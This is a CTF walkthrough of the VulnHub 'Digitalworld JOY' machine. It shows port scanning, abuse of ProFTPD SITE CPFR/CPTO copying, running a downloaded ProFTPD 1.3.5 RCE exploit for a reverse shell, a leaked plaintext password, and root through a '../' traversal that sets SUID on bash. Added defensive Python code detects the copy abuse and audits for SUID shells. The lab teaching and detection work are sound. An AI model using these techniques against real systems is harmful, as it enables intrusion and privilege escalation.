Digitalworld JOY ~ VulnHub


Prerequisite


Just to make life easier, I usually add an entry to my hosts file so the target machine can be reached by name.

echo "192.168.72.130 joy.vhub" >> /etc/hosts

hosts file entry


Okay, now on to the hacking!


Reconnaissance

As always, I started off with an NMAP scan against the machine.

┌──(root💀nee)-[~/boxes/vulnhub/digitalworldJOY]
└─# nmap -Pn -sV -sC -oN initial joy.vhub

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( nmap.org ) at 2021-02-25 04:34 EST
Nmap scan report for joy.vhub (192.168.72.133)
Host is up (0.000046s latency).
Not shown: 988 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
|_drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
22/tcp  open  ssh         Dropbear sshd 0.34 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2016-07-19 20:03  ossec/
|
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: CAPA UIDL SASL AUTH-RESP-CODE PIPELINING RESP-CODES TOP STLS
|_ssl-date: TLS randomness does not represent time
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: more IDLE ENABLE LOGINDISABLEDA0001 STARTTLS capabilities listed LITERAL+ post-login SASL-IR have ID Pre-login OK LOGIN-REFERRALS IMAP4rev1
|_ssl-date: TLS randomness does not represent time
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
465/tcp open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
587/tcp open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
993/tcp open  ssl/imaps?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
995/tcp open  ssl/pop3s?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:04:EF:C6 (VMware)
Service Info: Hosts: The, JOY.localdomain, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
| nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: joy
|   NetBIOS computer name: JOY\x00
|   Domain name: \x00
|   FQDN: joy
|_  System time: 2021-02-25T17:34:41+08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-02-25T09:34:41
|_  start_date: N/A

Scanning & Enumeration

From the scan, I saw that port 21 was running an FTP server (ProFTPD) that allowed anonymous users to log in and interact with it.


I then ran the following command to mirror the entire anonymous FTP root to my local system:

wget -m ftp://anonymous:anonymous@joy.vhub


The downloaded directory contained a text file that revealed the directory listing of the user patrick's home. In it was an interesting file named version_control.


I then used the unsecured FTP server to copy this file from patrick's home directory into the anonymous FTP root. That way I could view it locally without having access to the machine.

site cpfr
site cpto
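A defender-side counterpart to the copy above, added here as an example and not code from the write-up: it pairs SITE CPFR with the following SITE CPTO from the same account in an FTP command log and flags any copy whose source or destination leaves that account's permitted directory, including relative and "../" paths. The log line format, the ROOTS mapping and the sample lines are assumptions constructed for this example; map your own ProFTPD ExtendedLog format onto LINE_RE.

```python
import posixpath
import re

# Constructed log format for this example: "<date> <time> <user> <FTP command>".
LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<user>\S+) (?P<cmd>.+)$")
# Assumed directory each account is allowed to copy within.
ROOTS = {"anonymous": "/home/ftp", "patrick": "/home/patrick"}

def resolve(path, root):
    """Absolute, normalised path (relative paths start at root, '..' collapsed)
    and whether it still lies under root."""
    if not path.startswith("/"):
        path = posixpath.join(root, path)
    path = posixpath.normpath(path)
    return path, path == root or path.startswith(root.rstrip("/") + "/")

def find_copy_abuse(lines, roots=ROOTS):
    """Pair each SITE CPFR with the next SITE CPTO from the same user and
    return (user, src, dst) for pairs whose source or destination leaves
    that user's root. Anonymous copying out of another user's home, as in
    the write-up, is the case this catches."""
    findings, pending = [], {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["user"] not in roots:
            continue
        user, root = m["user"], roots[m["user"]]
        parts = m["cmd"].split(None, 2)
        if len(parts) != 3 or parts[0].upper() != "SITE":
            continue
        path, ok = resolve(parts[2], root)
        if parts[1].upper() == "CPFR":
            pending[user] = (path, ok)          # remember source until CPTO
        elif parts[1].upper() == "CPTO" and user in pending:
            src, src_ok = pending.pop(user)
            if not (src_ok and ok):
                findings.append((user, src, path))
    return findings

# Constructed sample: anonymous copies patrick's file into the writable
# upload directory, then tries a traversal; patrick makes a benign copy.
SAMPLE_LOG = """\
2021-02-25 17:30:05 anonymous SITE CPFR /home/patrick/version_control
2021-02-25 17:30:06 anonymous SITE CPTO /home/ftp/upload/version_control
2021-02-25 17:30:20 anonymous SITE CPFR ../../etc/passwd
2021-02-25 17:30:21 anonymous SITE CPTO upload/passwd
2021-02-25 17:31:10 patrick SITE CPFR notes.txt
2021-02-25 17:31:11 patrick SITE CPTO backup/notes.txt
""".splitlines()
```

Running find_copy_abuse(SAMPLE_LOG) reports both anonymous copies and nothing for patrick, since his paths resolve inside his own home.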


version_control

This file revealed that the machine was running ProFTPd 1.3.5. After digging around the net for a while, I found this RCE exploit on GitHub for that particular version of ProFTPd.

Exploitation

┌──(root💀nee)-[~/boxes/vulnhub/digitalworldJOY]
└─# wget raw.githubusercontent.com/thegingerninja/Pr..

┌──(root💀nee)-[~/boxes/vulnhub/digitalworldJOY]
└─# ./exploit_proftd_1_3_5.py


I then caught the incoming shell with a netcat listener.


Lateral Movement

I then ran linpeas.sh, as always, which revealed an interesting file in the web directory.


Reading this file gave me user patrick's credentials, but not root's.


patrick:apollo098765

Privilege Escalation

I first ran sudo -l to check for any binaries that the user patrick was authorized to run as root.


This revealed that patrick could run a single binary, test, with sudo permissions.


The binary seemed to be some sort of application for changing file permissions. My plan was to set the SUID bit on the bash binary and then use the -p option that bash provides.


I then ran the application and, when prompted for the file name in "this directory", I specified ../../../../../bin/bash. This ensured that the path climbed out of "this directory".


Lastly, I ran /bin/bash -p and gained root access to the machine~!
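The condition this escalation creates is a root-owned shell with the SUID bit set, which is cheap to audit for. The following is an added example, not the author's code: it walks a tree, reports every root-owned SUID regular file, and lists shell interpreters first. The SHELLS set and the (path, mode, uid) tuple format are my own choices.

```python
import os
import stat

# Shell interpreters that must never carry a root SUID bit: bash -p (and the
# others' equivalents) keep the raised effective uid instead of dropping it.
SHELLS = {"bash", "sh", "dash", "zsh", "ksh", "csh", "tcsh", "fish"}

def audit_entries(entries):
    """entries: iterable of (path, st_mode, st_uid) as os.lstat would give.
    Returns a list of (path, is_shell) for regular files that are SUID and
    owned by root, shells first so the most dangerous hits are at the top."""
    hits = []
    for path, mode, uid in entries:
        if not stat.S_ISREG(mode) or not mode & stat.S_ISUID or uid != 0:
            continue
        hits.append((path, os.path.basename(path) in SHELLS))
    hits.sort(key=lambda h: (not h[1], h[0]))
    return hits

def walk_entries(root):
    """Yield (path, mode, uid) for every file under root; lstat so symlinks
    are reported as links, not followed into other trees."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:          # vanished or unreadable entry; skip
                continue
            yield full, st.st_mode, st.st_uid

def audit_suid(root="/"):
    """Filesystem-wide audit; compare the output against a known-good
    baseline and alert on any new entry, not only on shells."""
    return audit_entries(walk_entries(root))

if __name__ == "__main__":
    for path, is_shell in audit_suid("/"):
        print(("SHELL " if is_shell else "suid  ") + path)
```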


ROOTY!